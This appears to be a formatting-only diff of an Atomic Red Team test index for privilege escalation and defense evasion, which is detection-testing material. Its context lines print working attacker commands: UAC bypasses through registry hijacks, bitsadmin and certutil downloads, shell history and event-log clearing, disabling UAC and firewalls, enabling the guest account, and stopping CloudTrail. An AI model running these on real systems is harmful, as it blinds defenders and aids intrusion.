@@ -20616,7 +20616,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore - ' +' name: powershell T1547.013: technique: @@ -21110,10 +21110,10 @@ defense-evasion: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} - ' +' cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' name: command_prompt - name: Bitsadmin Download (PowerShell) auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc @@ -21137,10 +21137,10 @@ defense-evasion: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} - ' +' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore - ' +' name: powershell - name: Persist, Download, & Execute auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae @@ -21178,7 +21178,7 @@ defense-evasion: bitsadmin.exe /complete #{bits_job_name} cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' name: command_prompt - name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 @@ -21210,10 +21210,10 @@ defense-evasion: command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr - ' +' cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >nul 2>&1 - ' +' name: command_prompt T1027.001: technique: @@ -21303,20 +21303,20 @@ defense-evasion: dependencies: - description: 'The binary must exist on disk at specified location (#{file_to_pad}) - ' +' prereq_command: 'if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'cp /bin/ls #{file_to_pad} - ' +' executor: command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} - ' +' cleanup_command: 'rm #{file_to_pad} - ' +' name: sh T1542.003: technique: 
@@ -21549,7 +21549,7 @@ defense-evasion: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 - ' +' name: command_prompt - name: Bypass UAC using Event Viewer (PowerShell) auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b @@ -21571,7 +21571,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Bypass UAC using Fodhelper auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 @@ -21593,7 +21593,7 @@ defense-evasion: cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1 - ' +' name: command_prompt - name: Bypass UAC using Fodhelper - PowerShell auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa @@ -21616,7 +21616,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Bypass UAC using ComputerDefaults (PowerShell) auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f @@ -21639,7 +21639,7 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Bypass UAC by Mocking Trusted Directories @@ -21687,7 +21687,7 @@ defense-evasion: cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore - ' +' name: powershell - name: Disable UAC using reg.exe auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 @@ -21700,11 +21700,11 @@ defense-evasion: command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f - ' +' cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f - ' +' name: command_prompt elevation_required: true - name: Bypass UAC using SilentCleanup task 
@@ -21751,7 +21751,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21762,7 +21762,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21787,7 +21787,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21798,7 +21798,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21822,7 +21822,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21833,7 +21833,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21858,7 +21858,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21869,7 +21869,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore 
@@ -21893,7 +21893,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21904,7 +21904,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21928,7 +21928,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21939,7 +21939,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -21964,7 +21964,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -21975,7 +21975,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -22000,7 +22000,7 @@ defense-evasion: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -22011,7 +22011,7 @@ defense-evasion: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore 
@@ -22093,7 +22093,7 @@ defense-evasion: description: 'Adversaries may supply CMSTP.exe with INF files infected with malicious commands - ' +' supported_platforms: - windows input_arguments: @@ -22105,24 +22105,24 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_file_path}) - ' +' prereq_command: 'if (Test-Path #{inf_file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T218.003.inf" -OutFile "#{inf_file_path}" executor: command: 'cmstp.exe /s #{inf_file_path} - ' +' name: command_prompt - name: CMSTP Executing UAC Bypass auto_generated_guid: 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 description: 'Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file - ' +' supported_platforms: - windows input_arguments: @@ -22134,17 +22134,17 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_file_uac}) - ' +' prereq_command: 'if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_file_uac}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf" -OutFile "#{inf_file_uac}" executor: command: 'cmstp.exe /s #{inf_file_uac} /au - ' +' name: command_prompt T1574.012: technique: 
@@ -22255,7 +22255,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -22300,7 +22300,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -22338,7 +22338,7 @@ defense-evasion: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" 
@@ -22422,71 +22422,71 @@ defense-evasion: auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc description: 'Clears bash history via rm - ' +' supported_platforms: - linux - macos executor: command: 'rm ~/.bash_history - ' +' name: sh - name: Clear Bash history (echo) auto_generated_guid: cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 description: 'Clears bash history via rm - ' +' supported_platforms: - linux executor: command: 'echo "" > ~/.bash_history - ' +' name: sh - name: Clear Bash history (cat dev/null) auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f description: 'Clears bash history via cat /dev/null - ' +' supported_platforms: - linux - macos executor: command: 'cat /dev/null > ~/.bash_history - ' +' name: sh - name: Clear Bash history (ln dev/null) auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 description: 'Clears bash history via a symlink to /dev/null - ' +' supported_platforms: - linux - macos executor: command: 'ln -sf /dev/null ~/.bash_history - ' +' name: sh - name: Clear Bash history (truncate) auto_generated_guid: 47966a1d-df4f-4078-af65-db6d9aa20739 description: 'Clears bash history via truncate - ' +' supported_platforms: - linux executor: command: 'truncate -s0 ~/.bash_history - ' +' name: sh - name: Clear history of a bunch of shells auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c description: 'Clears the history of a bunch of different shell types by setting the history size to zero - ' +' supported_platforms: - linux - macos @@ -22501,7 +22501,7 @@ defense-evasion: description: 'Clears the history and disable bash history logging of the current shell and future shell sessions - ' +' supported_platforms: - linux - macos @@ -22521,7 +22521,7 @@ defense-evasion: description: 'Using a space before a command causes the command to not be logged in the Bash History file - ' +' supported_platforms: - linux - macos 
@@ -22536,13 +22536,13 @@ defense-evasion: keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog - ' +' supported_platforms: - linux dependencies: - description: 'Install sshpass and create user account used for excuting - ' +' prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass >/dev/null)\n" get_prereq_command: | @@ -22552,35 +22552,35 @@ defense-evasion: executor: command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname - ' +' cleanup_command: 'userdel -f testuser1 - ' +' name: sh - name: Prevent Powershell History Logging auto_generated_guid: 2f898b81-3e97-4abb-bc3f-a95138988370 description: 'Prevents Powershell history - ' +' supported_platforms: - windows executor: command: 'Set-PSReadlineOption –HistorySaveStyle SaveNothing - ' +' name: powershell cleanup_command: Set-PSReadLineOption -HistorySaveStyle SaveIncrementally - name: Clear Powershell History by Deleting History File auto_generated_guid: da75ae8d-26d6-4483-b0fe-700e4df4f037 description: 'Clears Powershell history - ' +' supported_platforms: - windows executor: command: 'Remove-Item (Get-PSReadlineOption).HistorySavePath - ' +' name: powershell T1070.002: technique: @@ -22631,7 +22631,7 @@ defense-evasion: auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683 description: 'Delete system and audit logs - ' +' supported_platforms: - macos - linux @@ -22647,7 +22647,7 @@ defense-evasion: This technique was used by threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: @@ -22658,14 +22658,14 @@ defense-evasion: executor: command: 'echo 0> /var/spool/mail/#{username} - ' +' name: bash - name: Overwrite Linux Log auto_generated_guid: d304b2dc-90b4-4465-a650-16ddd503f7b5 description: 'This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: 
@@ -22676,7 +22676,7 @@ defense-evasion: executor: command: 'echo 0> #{log_path} - ' +' name: bash T1070.001: technique: @@ -22744,7 +22744,7 @@ defense-evasion: System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty. - ' +' supported_platforms: - windows input_arguments: @@ -22755,7 +22755,7 @@ defense-evasion: executor: command: 'wevtutil cl #{log_name} - ' +' name: command_prompt elevation_required: true - name: Delete System Logs Using Clear-EventLog @@ -22784,7 +22784,7 @@ defense-evasion: dependencies: - description: 'Microsoft Word must be installed - ' +' prereq_command: | try { New-Object -COMObject "Word.Application" | Out-Null @@ -22794,7 +22794,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -22865,7 +22865,7 @@ defense-evasion: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. - ' +' supported_platforms: - google-workspace - windows @@ -22900,20 +22900,20 @@ defense-evasion: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet - ' +' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud - ' +' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" - ' +' T1553.002: technique: external_references: 
@@ -23160,10 +23160,10 @@ defense-evasion: dependencies: - description: 'C# file must exist on disk at specified location (#{input_file}) - ' +' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/calc.cs" -OutFile "#{input_file}" @@ -23171,10 +23171,10 @@ defense-evasion: command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file} - ' +' cleanup_command: 'del #{output_file} >nul 2>&1 - ' +' name: command_prompt - name: Dynamic C# Compile auto_generated_guid: 453614d8-3ba6-4147-acc0-7ec4b3e1faef @@ -23196,24 +23196,24 @@ defense-evasion: dependencies: - description: 'exe file must exist on disk at specified location (#{input_file}) - ' +' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/bin/T1027.004_DynamicCompile.exe -OutFile #{input_file} - ' +' executor: command: 'Invoke-Expression #{input_file} - ' +' name: powershell - name: C compile auto_generated_guid: d0377aa6-850a-42b2-95f0-de558d80be57 description: 'Compile a c file with either gcc or clang on Linux or Macos. - ' +' supported_platforms: - linux - macos @@ -23226,14 +23226,14 @@ defense-evasion: dependencies: - description: 'the source file must exist on disk at specified location (#{input_file}) - ' +' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -OutFile #{input_file} - ' +' executor: command: | gcc #{input_file} && ./a.out 
@@ -23243,7 +23243,7 @@ defense-evasion: auto_generated_guid: da97bb11-d6d0-4fc1-b445-e443d1346efe description: 'Compile a c file with either gcc or clang on Linux or Macos. - ' +' supported_platforms: - linux - macos @@ -23256,14 +23256,14 @@ defense-evasion: dependencies: - description: 'the source file must exist on disk at specified location (#{input_file}) - ' +' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -OutFile #{input_file} - ' +' executor: command: | g++ #{input_file} && ./a.out @@ -23273,7 +23273,7 @@ defense-evasion: auto_generated_guid: 78bd3fa7-773c-449e-a978-dc1f1500bc52 description: 'Compile a c file with either gcc or clang on Linux or Macos. - ' +' supported_platforms: - linux - macos @@ -23286,18 +23286,18 @@ defense-evasion: dependencies: - description: 'the source file must exist on disk at specified location (#{input_file}) - ' +' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -OutFile #{input_file} - ' +' executor: command: 'go run #{input_file} - ' +' name: bash T1218.001: technique: 
@@ -23377,17 +23377,17 @@ defense-evasion: dependencies: - description: 'The payload must exist on disk at specified location (#{local_chm_file}) - ' +' prereq_command: 'if (Test-Path #{local_chm_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm" -OutFile "#{local_chm_file}" executor: command: 'hh.exe #{local_chm_file} - ' +' name: command_prompt - name: Compiled HTML Help Remote Payload auto_generated_guid: 0f8af516-9818-4172-922b-42986ef1e81d @@ -23404,7 +23404,7 @@ defense-evasion: executor: command: 'hh.exe #{remote_chm_file} - ' +' name: command_prompt - name: Invoke CHM with default Shortcut Command Execution auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7 @@ -23430,7 +23430,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' @@ -23463,7 +23463,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' @@ -23488,7 +23488,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}' name: powershell @@ -23529,7 +23529,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath 
@@ -23568,7 +23568,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath @@ -23721,17 +23721,17 @@ defense-evasion: dependencies: - description: 'Cpl file must exist on disk at specified location (#{cpl_file_path}) - ' +' prereq_command: 'if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{cpl_file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.002/bin/calc.cpl" -OutFile "#{cpl_file_path}" executor: command: 'control.exe #{cpl_file_path} - ' +' name: command_prompt T1578.002: technique: @@ -24082,10 +24082,10 @@ defense-evasion: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) - ' +' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -24093,7 +24093,7 @@ defense-evasion: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 - ' +' name: command_prompt T1078.001: technique: @@ -24213,7 +24213,7 @@ defense-evasion: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default - ' +' supported_platforms: - windows input_arguments: @@ -24224,10 +24224,10 @@ defense-evasion: executor: command: 'net user #{guest_user} /active:yes - ' +' cleanup_command: 'net user #{guest_user} /active:no - ' +' name: command_prompt elevation_required: true T1578.003: 
@@ -24366,7 +24366,7 @@ defense-evasion: description: 'Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) - ' +' supported_platforms: - windows input_arguments: @@ -24389,7 +24389,7 @@ defense-evasion: description: 'Use Python to decode a base64-encoded text string and echo it to the console - ' +' supported_platforms: - linux - macos @@ -24405,13 +24405,13 @@ defense-evasion: dependencies: - description: 'Python must be present - ' +' prereq_command: 'which python3 - ' +' get_prereq_command: 'echo "Please install Python 3" - ' +' executor: name: sh elevation_required: false @@ -24428,7 +24428,7 @@ defense-evasion: description: 'Use Perl to decode a base64-encoded text string and echo it to the console - ' +' supported_platforms: - linux - macos @@ -24444,13 +24444,13 @@ defense-evasion: dependencies: - description: 'Perl must be present - ' +' prereq_command: 'which perl - ' +' get_prereq_command: 'echo "Please install Perl" - ' +' executor: name: sh elevation_required: false @@ -24464,7 +24464,7 @@ defense-evasion: description: 'Use common shell utilities to decode a base64-encoded text string and echo it to the console - ' +' supported_platforms: - linux - macos @@ -24495,7 +24495,7 @@ defense-evasion: description: 'Use common shell utilities to decode a hex-encoded text string and echo it to the console - ' +' supported_platforms: - linux - macos @@ -24511,13 +24511,13 @@ defense-evasion: dependencies: - description: 'xxd must be present - ' +' prereq_command: 'which xxd - ' +' get_prereq_command: 'echo "Please install xxd" - ' +' executor: name: sh elevation_required: false @@ -24750,7 +24750,7 @@ defense-evasion: description: 'Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail - ' +' supported_platforms: - iaas:aws input_arguments: 
@@ -24769,7 +24769,7 @@ defense-evasion: dependencies: - description: 'Check if ~/.aws/credentials file has a default stanza is configured - ' +' prereq_command: | cat ~/.aws/credentials | grep "default" aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region} @@ -24777,7 +24777,7 @@ defense-evasion: get_prereq_command: 'echo Please install the aws-cli and configure your AWS defult profile using: aws configure - ' +' executor: command: | aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region} @@ -24884,7 +24884,7 @@ defense-evasion: command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true - ' +' cleanup_command: | if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){ C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null @@ -24959,10 +24959,10 @@ defense-evasion: executor: command: 'wevtutil sl "#{log_name}" /e:false - ' +' cleanup_command: 'wevtutil sl "#{log_name}" /e:true - ' +' name: command_prompt T1562.007: technique: @@ -25062,10 +25062,10 @@ defense-evasion: executor: command: 'netsh advfirewall set currentprofile state off - ' +' cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1 - ' +' name: command_prompt - name: Disable Microsoft Defender Firewall via Registry auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612 @@ -25078,11 +25078,11 @@ defense-evasion: command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f - ' +' cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 1 /f - ' +' name: command_prompt - name: Allow SMB and RDP on Microsoft Defender Firewall auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1 
@@ -25097,7 +25097,7 @@ defense-evasion: netsh advfirewall firewall set rule group="file and printer sharing" new enable=Yes cleanup_command: 'netsh advfirewall reset >nul 2>&1 - ' +' name: command_prompt - name: Opening ports for proxy - HARDRAIN auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80 @@ -25156,27 +25156,27 @@ defense-evasion: auto_generated_guid: fe135572-edcd-49a2-afe6-1d39521c5a9a description: 'Stop the Uncomplicated Firewall (UFW) if installed. - ' +' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'Check if ufw is installed on the machine. - ' +' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true command: 'ufw disable - ' +' cleanup_command: | ufw enable ufw status verbose @@ -25190,7 +25190,7 @@ defense-evasion: dependencies: - description: 'Check if systemctl and ufw is installed on the machine. - ' +' prereq_command: "if [ ! -x \"$(command -v systemctl)\" ]; then echo -e \"\\n***** systemctl NOT installed *****\\n\"; exit 1; fi\nif [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; @@ -25198,13 +25198,13 @@ defense-evasion: ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true command: 'systemctl stop ufw - ' +' cleanup_command: | systemctl start ufw systemctl status ufw 
@@ -25217,20 +25217,20 @@ defense-evasion: dependencies: - description: 'Check if ufw is installed on the machine and enabled. - ' +' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true command: 'ufw logging off - ' +' cleanup_command: | ufw logging low ufw status verbose @@ -25244,14 +25244,14 @@ defense-evasion: dependencies: - description: 'Check if ufw is installed on the machine and enabled. - ' +' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -25265,21 +25265,21 @@ defense-evasion: auto_generated_guid: beaf815a-c883-4194-97e9-fdbbb2bbdd7c description: 'Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules. - ' +' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'Check if /etc/ufw/user.rules exists. - ' +' prereq_command: 'if [ ! -f "/etc/ufw/user.rules" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -25288,7 +25288,7 @@ defense-evasion: grep "# THIS IS A COMMENT" /etc/ufw/user.rules cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/ufw/user.rules - ' +' - name: Edit UFW firewall ufw.conf file auto_generated_guid: c1d8c4eb-88da-4927-ae97-c7c25893803b description: "Edit the Uncomplicated Firewall (UFW) configuration file /etc/ufw/ufw.conf 
